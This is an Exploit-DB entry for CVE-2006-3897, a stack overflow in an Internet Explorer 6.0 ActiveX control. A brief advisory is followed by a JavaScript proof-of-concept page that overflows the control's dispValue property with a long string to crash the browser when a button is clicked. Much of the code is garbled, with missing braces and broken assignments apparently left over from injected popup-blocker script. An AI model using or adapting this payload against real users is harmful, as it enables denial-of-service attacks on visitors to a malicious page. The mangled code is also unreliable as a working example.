Microsoft Internet Explorer 6.0 NMSA.ASFSourceMediaDescription Stack Overflow Vulnerability

ID EDB-ID:28259
Type exploitdb
Reporter hdm
Modified 2006-07-24T00:00:00


Microsoft Internet Explorer 6.0 NMSA.ASFSourceMediaDescription Stack Overflow Vulnerability. CVE-2006-3897. Dos exploit for windows platform


Microsoft Internet Explorer is prone to a stack-overflow vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

<script language="JavaScript">

function SymError()
  return true;

window.onerror = SymError;

var SymRealWinOpen =;

function SymWinOpen(url, name, attributes)
  return (new Object());
} = SymWinOpen;



function Demo() {
	var a = new ActiveXObject('NMSA.ASFSourceMediaDescription.1');
	var b = 'XXXX';
	while (b.length <= 1024) b += b;
	a.dispValue = b;	


Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


<script language="JavaScript">
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{ = SymWinOpen;
  if(SymRealOnUnload != null)

function SymOnLoad()
  if(SymRealOnLoad != null)
     SymRealOnLoad(); = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;